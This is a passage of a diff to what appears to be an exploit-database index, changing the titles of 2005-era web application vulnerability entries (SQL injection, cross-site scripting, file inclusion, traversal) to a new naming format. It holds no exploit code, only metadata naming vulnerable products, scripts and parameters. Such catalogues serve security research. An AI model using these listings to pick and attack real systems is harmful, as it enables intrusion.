Injection",2005-11-24,r0t3d3Vil,php,webapps,0 26591,platforms/php/webapps/26591.txt,"efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scripting",2005-11-25,retrogod@aliceposta.it,php,webapps,0 26592,platforms/php/webapps/26592.txt,"efiction 1.0/1.1/2.0 - 'titles.php' SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 -26593,platforms/php/webapps/26593.txt,"efiction 1.0/1.1/2.0 - 'sid' Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 -26594,platforms/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 - 'uid' Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 +26593,platforms/php/webapps/26593.txt,"efiction 1.0/1.1/2.0 - 'sid' SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 +26594,platforms/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 - 'uid' SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 26595,platforms/php/webapps/26595.txt,"IsolSoft Support Center 2.2 - Multiple SQL Injections",2005-11-25,r0t3d3Vil,php,webapps,0 26596,platforms/php/webapps/26596.txt,"AgileBill 1.4.92 - Product_Cat SQL Injection",2005-11-25,r0t,php,webapps,0 26597,platforms/php/webapps/26597.txt,"PBLang Bulletin Board System 4.65 - Multiple HTML Injection Vulnerabilities",2005-11-26,r0xes,php,webapps,0 26598,platforms/php/webapps/26598.txt,"Athena PHP Website Administration 0.1 - Remote File Inclusion",2005-11-26,[GB],php,webapps,0 26599,platforms/php/webapps/26599.txt,"PHPGreetz 0.99 - Remote File Inclusion",2005-11-26,[GB],php,webapps,0 26600,platforms/php/webapps/26600.txt,"Q-News 2.0 - Remote File Inclusion",2005-11-26,[GB],php,webapps,0 -26602,platforms/php/webapps/26602.txt,"Enterprise Heart Enterprise Connector 1.0.2 - send.php messageid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26603,platforms/php/webapps/26603.txt,"Enterprise Heart Enterprise Connector 1.0.2 - messages.php messageid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26602,platforms/php/webapps/26602.txt,"Enterprise Heart Enterprise Connector 1.0.2 - 'send.php?messageid' SQL Injection",2005-11-28,r0t,php,webapps,0 +26603,platforms/php/webapps/26603.txt,"Enterprise Heart Enterprise Connector 1.0.2 - 'messages.php?messageid' SQL Injection",2005-11-28,r0t,php,webapps,0 26604,platforms/php/webapps/26604.txt,"Zainu 2.0 - SQL Injection",2005-11-28,r0t,php,webapps,0 26605,platforms/php/webapps/26605.txt,"Babe Logger 2.0 - 'index.php' gal Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26606,platforms/php/webapps/26606.txt,"Babe Logger 2.0 - comments.php id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26606,platforms/php/webapps/26606.txt,"Babe Logger 2.0 - 'comments.php?id' SQL Injection",2005-11-28,r0t,php,webapps,0 26607,platforms/php/webapps/26607.txt,"Top Music Module 3.0 - SQL Injection",2005-11-28,r0t,php,webapps,0 26608,platforms/php/webapps/26608.txt,"phpWordPress 3.0 - Multiple SQL Injections",2005-11-28,r0t,php,webapps,0 -26609,platforms/php/webapps/26609.txt,"Bedeng PSP 1.1 - baca.php ckode Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26610,platforms/php/webapps/26610.txt,"Bedeng PSP 1.1 - download.php a.ngroup Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26609,platforms/php/webapps/26609.txt,"Bedeng PSP 1.1 - 'baca.php?ckode' SQL Injection",2005-11-28,r0t,php,webapps,0 +26610,platforms/php/webapps/26610.txt,"Bedeng PSP 1.1 - 'download.php?a.ngroup' SQL Injection",2005-11-28,r0t,php,webapps,0 26611,platforms/php/webapps/26611.txt,"Bedeng PSP 1.1 - 'index.php' a.nsub Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26612,platforms/php/webapps/26612.txt,"Nelogic Nephp Publisher 4.5.2 - SQL Injection",2005-11-28,r0t,php,webapps,0 -26613,platforms/php/webapps/26613.txt,"Softbiz Resource Repository Script - details_res.php sbres_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26614,platforms/php/webapps/26614.txt,"Softbiz Resource Repository Script - showcats.php sbcat_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26615,platforms/php/webapps/26615.txt,"Softbiz Resource Repository Script - refer_friend.php sbres_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26616,platforms/php/webapps/26616.txt,"Softbiz Resource Repository Script - report_link.php sbres_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26613,platforms/php/webapps/26613.txt,"Softbiz Resource Repository Script - 'details_res.php?sbres_id' SQL Injection",2005-11-28,r0t,php,webapps,0 +26614,platforms/php/webapps/26614.txt,"Softbiz Resource Repository Script - 'showcats.php?sbcat_id' SQL Injection",2005-11-28,r0t,php,webapps,0 +26615,platforms/php/webapps/26615.txt,"Softbiz Resource Repository Script - 'refer_friend.php?sbres_id' SQL Injection",2005-11-28,r0t,php,webapps,0 +26616,platforms/php/webapps/26616.txt,"Softbiz Resource Repository Script - 'report_link.php?sbres_id' SQL Injection",2005-11-28,r0t,php,webapps,0 26617,platforms/php/webapps/26617.txt,"BerliOS SourceWell 1.1.3 - SQL Injection",2005-11-28,r0t,php,webapps,0 26618,platforms/php/webapps/26618.txt,"AllWeb Search 3.0 - SQL Injection",2005-11-28,r0t,php,webapps,0 26619,platforms/php/webapps/26619.txt,"K-Search 1.0 - SQL Injection",2005-11-28,r0t,php,webapps,0 @@ -29163,25 +29164,25 @@ id,file,description,date,author,platform,type,port 26623,platforms/php/webapps/26623.txt,"Kasseler CMS 2 r1223 - Multiple Vulnerabilities",2013-07-05,"High-Tech Bridge SA",php,webapps,0 26624,platforms/php/webapps/26624.txt,"OpenX 2.8.10 - Multiple Vulnerabilities",2013-07-05,"High-Tech Bridge SA",php,webapps,0 26625,platforms/php/webapps/26625.txt,"EdmoBBS 0.9 - SQL Injection",2005-11-28,r0t,php,webapps,0 -26626,platforms/php/webapps/26626.txt,"UGroup 2.6.2 - forum.php FORUM_ID Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26627,platforms/php/webapps/26627.txt,"UGroup 2.6.2 - topic.php Multiple Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26626,platforms/php/webapps/26626.txt,"UGroup 2.6.2 - 'forum.php?FORUM_ID' SQL Injection",2005-11-28,r0t,php,webapps,0 +26627,platforms/php/webapps/26627.txt,"UGroup 2.6.2 - 'topic.php' Multiple SQL Injections",2005-11-28,r0t,php,webapps,0 26628,platforms/php/webapps/26628.txt,"ShockBoard 3.0/4.0 - Offset Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26629,platforms/php/webapps/26629.txt,"Netzbrett 1.5.1 - P_Entry Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26630,platforms/php/webapps/26630.txt,"ADC2000 NG Pro 1.2 - SQL Injection",2005-11-28,r0t,php,webapps,0 -26631,platforms/php/webapps/26631.txt,"Simple Document Management System 2.0 - list.php folder_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26632,platforms/php/webapps/26632.txt,"Simple Document Management System 2.0 - messages.php mid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26631,platforms/php/webapps/26631.txt,"Simple Document Management System 2.0 - 'list.php?folder_id' SQL Injection",2005-11-28,r0t,php,webapps,0 +26632,platforms/php/webapps/26632.txt,"Simple Document Management System 2.0 - 'messages.php?mid' SQL Injection",2005-11-28,r0t,php,webapps,0 26633,platforms/php/webapps/26633.txt,"PDJK-support Suite 1.1 - Multiple SQL Injections",2005-11-28,r0t,php,webapps,0 26634,platforms/php/webapps/26634.txt,"Randshop - Multiple SQL Injections",2005-11-28,liz0,php,webapps,0 26635,platforms/php/webapps/26635.txt,"FreeWebStat 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-11-28,"Francesco Ongaro",php,webapps,0 26636,platforms/php/webapps/26636.txt,"PHP Web Statistik 1.4 - Content Injection",2005-11-28,"Francesco Ongaro",php,webapps,0 -26637,platforms/php/webapps/26637.txt,"Helpdesk Issue Manager 0.x - issue.php id Parameter SQL Injection",2005-11-28,r0t3d3Vil,php,webapps,0 -26638,platforms/php/webapps/26638.txt,"Helpdesk Issue Manager 0.x - 'find.php' Multiple Parameter SQL Injection",2005-11-28,r0t3d3Vil,php,webapps,0 -26639,platforms/php/webapps/26639.txt,"GuppY 4.5 - editorTypetool.php meskin Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 -26640,platforms/php/webapps/26640.txt,"GuppY 4.5 - archbatch.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 -26641,platforms/php/webapps/26641.txt,"GuppY 4.5 - dbbatch.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 -26642,platforms/php/webapps/26642.txt,"GuppY 4.5 - nwlmail.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 +26637,platforms/php/webapps/26637.txt,"Helpdesk Issue Manager 0.x - 'issue.php?id' SQL Injection",2005-11-28,r0t3d3Vil,php,webapps,0 +26638,platforms/php/webapps/26638.txt,"Helpdesk Issue Manager 0.x - 'find.php' Multiple SQL Injections",2005-11-28,r0t3d3Vil,php,webapps,0 +26639,platforms/php/webapps/26639.txt,"GuppY 4.5 - 'editorTypetool.php?meskin' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 +26640,platforms/php/webapps/26640.txt,"GuppY 4.5 - 'archbatch.php?lng' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 +26641,platforms/php/webapps/26641.txt,"GuppY 4.5 - 'dbbatch.php?lng' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 +26642,platforms/php/webapps/26642.txt,"GuppY 4.5 - 'nwlmail.php?lng' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 26643,platforms/php/webapps/26643.txt,"PHP Doc System 1.5.1 - Local File Inclusion",2005-11-28,r0t,php,webapps,0 -26644,platforms/php/webapps/26644.txt,"SearchSolutions 1.2/1.3 - Multiple Products Cross-Site Scripting Vulnerabilities",2005-11-28,r0t,php,webapps,0 +26644,platforms/php/webapps/26644.txt,"SearchSolutions 1.2/1.3 (Multiple Products) - Cross-Site Scripting",2005-11-28,r0t,php,webapps,0 26645,platforms/php/webapps/26645.txt,"ASP-Rider 1.6 - default.asp SQL Injection",2005-11-29,info@hoder.com,php,webapps,0 26646,platforms/php/webapps/26646.txt,"PHP Upload Center - 'index.php' Directory Traversal",2005-11-29,liz0,php,webapps,0 26647,platforms/php/webapps/26647.txt,"Fantastic Scripts Fantastic News 2.1.1 - 'news.php' SQL Injection",2005-11-29,r0t3d3Vil,php,webapps,0 @@ -29195,7 +29196,7 @@ id,file,description,date,author,platform,type,port 26656,platforms/php/webapps/26656.txt,"Orca KnowledgeBase 2.1 - 'KnowledgeBase.php' SQL Injection",2005-11-29,r0t,php,webapps,0 26657,platforms/php/webapps/26657.txt,"Orca Blog 1.3 - blog.php SQL Injection",2005-11-29,r0t,php,webapps,0 26658,platforms/php/webapps/26658.txt,"Orca Ringmaker 2.3 - Ringmaker.php SQL Injection",2005-11-29,r0t,php,webapps,0 -26659,platforms/php/webapps/26659.txt,"FAQ System 1.1 - viewFAQ.php Multiple Parameter SQL Injection",2005-11-29,r0t,php,webapps,0 +26659,platforms/php/webapps/26659.txt,"FAQ System 1.1 - 'viewFAQ.php' Multiple SQL Injections",2005-11-29,r0t,php,webapps,0 26660,platforms/php/webapps/26660.txt,"FAQ System 1.1 - 'index.php' category_id Parameter SQL Injection",2005-11-29,r0t,php,webapps,0 26661,platforms/php/webapps/26661.txt,"Survey System 1.1 - survey.php SQL Injection",2005-11-29,r0t,php,webapps,0 26662,platforms/php/webapps/26662.php,"N-13 News 1.2 - SQL Injection",2005-11-29,KingOfSka,php,webapps,0 @@ -29203,58 +29204,58 @@ id,file,description,date,author,platform,type,port 26664,platforms/hardware/webapps/26664.txt,"D-Link - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,hardware,webapps,0 26667,platforms/php/webapps/26667.txt,"SocketKB 1.1 - 'index.php' SQL Injection",2005-11-30,r0t,php,webapps,0 26668,platforms/php/webapps/26668.txt,"PHP Photo Album 0.2.3/4.1 - Local File Inclusion",2005-11-30,r0t3d3Vil,php,webapps,0 -26669,platforms/php/webapps/26669.txt,"SoftBiz B2B trading Marketplace Script 1.1 - selloffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26670,platforms/php/webapps/26670.txt,"SoftBiz B2B trading Marketplace Script 1.1 - buyoffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26671,platforms/php/webapps/26671.txt,"SoftBiz B2B trading Marketplace Script 1.1 - products.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26672,platforms/php/webapps/26672.txt,"SoftBiz B2B trading Marketplace Script 1.1 - profiles.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26669,platforms/php/webapps/26669.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'selloffers.php?cid' SQL Injection",2005-11-30,r0t,php,webapps,0 +26670,platforms/php/webapps/26670.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'buyoffers.php?cid' SQL Injection",2005-11-30,r0t,php,webapps,0 +26671,platforms/php/webapps/26671.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'products.php?cid' SQL Injection",2005-11-30,r0t,php,webapps,0 +26672,platforms/php/webapps/26672.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'profiles.php?cid' SQL Injection",2005-11-30,r0t,php,webapps,0 26673,platforms/php/webapps/26673.txt,"SoftBiz FAQ 1.1 - 'index.php' cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26674,platforms/php/webapps/26674.txt,"SoftBiz FAQ 1.1 - faq_qanda.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26675,platforms/php/webapps/26675.txt,"SoftBiz FAQ 1.1 - refer_friend.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26676,platforms/php/webapps/26676.txt,"SoftBiz FAQ 1.1 - print_article.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26677,platforms/php/webapps/26677.txt,"SoftBiz FAQ 1.1 - add_comment.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26674,platforms/php/webapps/26674.txt,"SoftBiz FAQ 1.1 - 'faq_qanda.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 +26675,platforms/php/webapps/26675.txt,"SoftBiz FAQ 1.1 - 'refer_friend.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 +26676,platforms/php/webapps/26676.txt,"SoftBiz FAQ 1.1 - 'print_article.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 +26677,platforms/php/webapps/26677.txt,"SoftBiz FAQ 1.1 - 'add_comment.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 26678,platforms/php/webapps/26678.txt,"FAQRing 3.0 - answer.php SQL Injection",2005-11-30,r0t,php,webapps,0 -26679,platforms/php/webapps/26679.txt,"WSN Knowledge Base 1.2 - 'index.php' Multiple Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26680,platforms/php/webapps/26680.txt,"WSN Knowledge Base 1.2 - comments.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26681,platforms/php/webapps/26681.txt,"WSN Knowledge Base 1.2 - memberlist.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26679,platforms/php/webapps/26679.txt,"WSN Knowledge Base 1.2 - 'index.php' Multiple SQL Injections",2005-11-30,r0t,php,webapps,0 +26680,platforms/php/webapps/26680.txt,"WSN Knowledge Base 1.2 - 'comments.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 +26681,platforms/php/webapps/26681.txt,"WSN Knowledge Base 1.2 - 'memberlist.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 26682,platforms/php/webapps/26682.txt,"OpenNetAdmin 13.03.01 - Remote Code Execution",2013-07-07,Mandat0ry,php,webapps,0 26683,platforms/php/webapps/26683.txt,"O-Kiraku Nikki 1.3 - Nikki.php SQL Injection",2005-11-30,r0t,php,webapps,0 26684,platforms/php/webapps/26684.txt,"88Scripts Event Calendar 2.0 - 'index.php' SQL Injection",2005-11-30,r0t,php,webapps,0 -26685,platforms/php/webapps/26685.txt,"Instant Photo Gallery 1.0 - portfolio.php cat_id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26686,platforms/php/webapps/26686.txt,"Instant Photo Gallery 1.0 - content.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26685,platforms/php/webapps/26685.txt,"Instant Photo Gallery 1.0 - 'portfolio.php?cat_id' SQL Injection",2005-11-30,r0t,php,webapps,0 +26686,platforms/php/webapps/26686.txt,"Instant Photo Gallery 1.0 - 'content.php?cid' SQL Injection",2005-11-30,r0t,php,webapps,0 26687,platforms/php/webapps/26687.txt,"WebCalendar 1.0.1 - Multiple SQL Injections",2005-12-01,lwang,php,webapps,0 26688,platforms/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection",2005-12-01,r0t,php,webapps,0 26689,platforms/php/webapps/26689.txt,"DotClear 1.2.1/1.2.2 - Session.php SQL Injection",2005-12-01,Siegfried,php,webapps,0 26691,platforms/php/webapps/26691.txt,"WebCalendar 1.0.1 - 'Layers_Toggle.php' HTTP Response Splitting",2005-12-01,lwang,php,webapps,0 26692,platforms/php/webapps/26692.txt,"Extreme Corporate 6.0 - Extremesearch.php Cross-Site Scripting",2005-12-01,r0t,php,webapps,0 26693,platforms/php/webapps/26693.txt,"Edgewall Software Trac 0.9 Ticket Query Module - SQL Injection",2005-12-01,"David Maciejak",php,webapps,0 -26694,platforms/php/webapps/26694.txt,"PHPMyChat 0.14.6 - start_page.css.php medium Parameter Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 -26695,platforms/php/webapps/26695.txt,"PHPMyChat 0.14.6 - style.css.php medium Parameter Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 -26696,platforms/php/webapps/26696.txt,"PHPMyChat 0.14.6 - users_popupL.php From Parameter Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 +26694,platforms/php/webapps/26694.txt,"PHPMyChat 0.14.6 - 'start_page.css.php?medium' Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 +26695,platforms/php/webapps/26695.txt,"PHPMyChat 0.14.6 - 'style.css.php?medium' Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 +26696,platforms/php/webapps/26696.txt,"PHPMyChat 0.14.6 - 'users_popupL.php?From' Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 26697,platforms/php/webapps/26697.php,"PHPX 3.5.x - Admin 'login.php' SQL Injection",2005-11-30,rgod,php,webapps,0 -26698,platforms/php/webapps/26698.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - gallery.php CatID Parameter SQL Injection",2005-12-02,r0t,php,webapps,0 -26699,platforms/php/webapps/26699.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - ViewItem.php ItemNum Parameter SQL Injection",2005-12-02,r0t,php,webapps,0 +26698,platforms/php/webapps/26698.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - 'gallery.php?CatID' SQL Injection",2005-12-02,r0t,php,webapps,0 +26699,platforms/php/webapps/26699.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - 'ViewItem.php?ItemNum' SQL Injection",2005-12-02,r0t,php,webapps,0 26700,platforms/jsp/webapps/26700.txt,"Java Search Engine 0.9.34 - search.jsp Cross-Site Scripting",2005-12-02,r0t,jsp,webapps,0 -26701,platforms/asp/webapps/26701.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d - adv_search.asp srch_product_name Parameter Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 -26702,platforms/asp/webapps/26702.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d - bsearch.asp b_search Parameter Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 +26701,platforms/asp/webapps/26701.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'adv_search.asp?srch_product_name' Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 +26702,platforms/asp/webapps/26702.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'bsearch.asp?b_search' Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 26704,platforms/asp/webapps/26704.txt,"Solupress News 1.0 - 'search.asp' Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 26705,platforms/asp/webapps/26705.txt,"SiteBeater News 4.0 - Archive.asp Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 26706,platforms/php/webapps/26706.txt,"PHP-Fusion 6.0.109 - 'messages.php' SQL Injection",2005-12-03,"Nolan West",php,webapps,0 26707,platforms/php/webapps/26707.txt,"Alisveristr E-Commerce Login - Multiple SQL Injections",2005-12-03,B3g0k,php,webapps,0 -26713,platforms/php/webapps/26713.txt,"PHPYellowTM 5.33 - search_result.php haystack Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 -26714,platforms/php/webapps/26714.txt,"PHPYellowTM 5.33 - print_me.php ckey Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 +26713,platforms/php/webapps/26713.txt,"PHPYellowTM 5.33 - 'search_result.php?haystack' SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 +26714,platforms/php/webapps/26714.txt,"PHPYellowTM 5.33 - 'print_me.php?ckey' SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 26715,platforms/php/webapps/26715.txt,"Widget Property 1.1.19 - Property.php SQL Injection",2005-11-05,r0t3d3Vil,php,webapps,0 26716,platforms/cgi/webapps/26716.txt,"Easy Search System 1.1 - search.cgi Cross-Site Scripting",2005-12-05,r0t,cgi,webapps,0 -26717,platforms/php/webapps/26717.txt,"Web4Future eCommerce Enterprise Edition 2.1 - view.php Multiple Parameter SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 -26718,platforms/php/webapps/26718.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'index.php' Multiple Parameter SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 -26719,platforms/php/webapps/26719.txt,"Web4Future eCommerce Enterprise Edition 2.1 - viewbrands.php bid Parameter SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 -26720,platforms/php/webapps/26720.txt,"SAMEDIA LandShop 0.6.3 - ls.php Multiple Parameter SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 +26717,platforms/php/webapps/26717.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'view.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps,0 +26718,platforms/php/webapps/26718.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'index.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps,0 +26719,platforms/php/webapps/26719.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'viewbrands.php?bid' SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 +26720,platforms/php/webapps/26720.txt,"SAMEDIA LandShop 0.6.3 - 'ls.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps,0 26721,platforms/cgi/webapps/26721.txt,"1-Script 1-Search 1.8 - '1search.CGI' Cross-Site Scripting",2005-12-05,r0t,cgi,webapps,0 26722,platforms/php/webapps/26722.txt,"Hobosworld HobSR - Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps,0 26723,platforms/php/webapps/26723.txt,"Relative Real Estate Systems 1.2 - SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 -26724,platforms/php/webapps/26724.txt,"Web4Future eDating Professional 5.0 - 'index.php' Multiple Parameter SQL Injection",2005-12-05,r0t,php,webapps,0 -26725,platforms/php/webapps/26725.txt,"Web4Future eDating Professional 5.0 - gift.php cid Parameter SQL Injection",2005-12-05,r0t,php,webapps,0 -26726,platforms/php/webapps/26726.txt,"Web4Future eDating Professional 5.0 - articles.php cat Parameter SQL Injection",2005-12-05,r0t,php,webapps,0 -26727,platforms/php/webapps/26727.txt,"Web4Future eDating Professional 5.0 - fq.php cid Parameter SQL Injection",2005-12-05,r0t,php,webapps,0 +26724,platforms/php/webapps/26724.txt,"Web4Future eDating Professional 5.0 - 'index.php' Multiple SQL Injections",2005-12-05,r0t,php,webapps,0 +26725,platforms/php/webapps/26725.txt,"Web4Future eDating Professional 5.0 - 'gift.php?cid' SQL Injection",2005-12-05,r0t,php,webapps,0 +26726,platforms/php/webapps/26726.txt,"Web4Future eDating Professional 5.0 - 'articles.php?cat' SQL Injection",2005-12-05,r0t,php,webapps,0 +26727,platforms/php/webapps/26727.txt,"Web4Future eDating Professional 5.0 - 'fq.php?cid' SQL Injection",2005-12-05,r0t,php,webapps,0 26728,platforms/php/webapps/26728.txt,"Web4Future Portal Solutions - Comentarii.php SQL Injection",2005-12-05,r0t,php,webapps,0 26729,platforms/php/webapps/26729.txt,"Web4Future Affiliate Manager PRO 4.1 - functions.php SQL Injection",2005-12-05,r0t,php,webapps,0 26730,platforms/php/webapps/26730.txt,"Web4Future Portal Solutions - Arhiva.php Directory Traversal",2005-12-05,r0t,php,webapps,0 @@ -29268,21 +29269,21 @@ id,file,description,date,author,platform,type,port 26743,platforms/asp/webapps/26743.txt,"IISWorks ASPKnowledgeBase 2.0 - KB.asp Cross-Site Scripting",2005-12-06,r0t,asp,webapps,0 26744,platforms/asp/webapps/26744.txt,"NetAuctionHelp 3.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-06,r0t,asp,webapps,0 26745,platforms/asp/webapps/26745.txt,"RWAuction Pro 4.0 - search.asp Cross-Site Scripting",2005-12-06,r0t,asp,webapps,0 -26746,platforms/asp/webapps/26746.txt,"A-FAQ 1.0 - faqDspItem.asp faqid Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 -26747,platforms/asp/webapps/26747.txt,"A-FAQ 1.0 - faqDsp.asp catcode Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 +26746,platforms/asp/webapps/26746.txt,"A-FAQ 1.0 - 'faqDspItem.asp?faqid' SQL Injection",2005-12-06,r0t,asp,webapps,0 +26747,platforms/asp/webapps/26747.txt,"A-FAQ 1.0 - 'faqDsp.asp?catcode' SQL Injection",2005-12-06,r0t,asp,webapps,0 26748,platforms/php/webapps/26748.txt,"DoceboLms 2.0.x - connector.php Directory Traversal",2005-12-06,rgod,php,webapps,0 26750,platforms/php/webapps/26750.txt,"PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections",2005-12-06,r0t,php,webapps,0 26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 - 'index.php' Multiple SQL Injections",2005-12-06,r0t,php,webapps,0 -26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 - calendar.php year Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 -26756,platforms/php/webapps/26756.txt,"Thwboard Beta 2.8 - v_profile.php user Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 -26757,platforms/php/webapps/26757.txt,"Thwboard Beta 2.8 - misc.php userid Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 +26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 - 'calendar.php?year' SQL Injection",2005-12-07,trueend5,php,webapps,0 +26756,platforms/php/webapps/26756.txt,"Thwboard Beta 2.8 - 'v_profile.php?user' SQL Injection",2005-12-07,trueend5,php,webapps,0 +26757,platforms/php/webapps/26757.txt,"Thwboard Beta 2.8 - 'misc.php?userid' SQL Injection",2005-12-07,trueend5,php,webapps,0 26758,platforms/php/webapps/26758.txt,"DRZES Hms 3.2 - 'login.php' Cross-Site Scripting",2005-12-07,Vipsta,php,webapps,0 -26759,platforms/asp/webapps/26759.txt,"ASPMForum - forum.asp baslik Parameter SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 -26760,platforms/asp/webapps/26760.txt,"ASPMForum - kullanicilistesi.asp harf Parameter SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 +26759,platforms/asp/webapps/26759.txt,"ASPMForum - 'forum.asp?baslik' SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 +26760,platforms/asp/webapps/26760.txt,"ASPMForum - 'kullanicilistesi.asp?harf' SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 26761,platforms/cgi/webapps/26761.txt,"Dell TrueMobile 2300 - Remote Credential Reset",2005-12-07,TNull,cgi,webapps,0 26763,platforms/cfm/webapps/26763.txt,"Magic List Pro - view_archive.cfm ListID Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0 26764,platforms/cfm/webapps/26764.txt,"Magic Forum Personal - view_forum.cfm ForumID Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0 -26765,platforms/cfm/webapps/26765.txt,"Magic Forum Personal - view_thread.cfm Multiple Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0 +26765,platforms/cfm/webapps/26765.txt,"Magic Forum Personal - 'view_thread.cfm' Multiple SQL Injections",2005-12-08,r0t,cfm,webapps,0 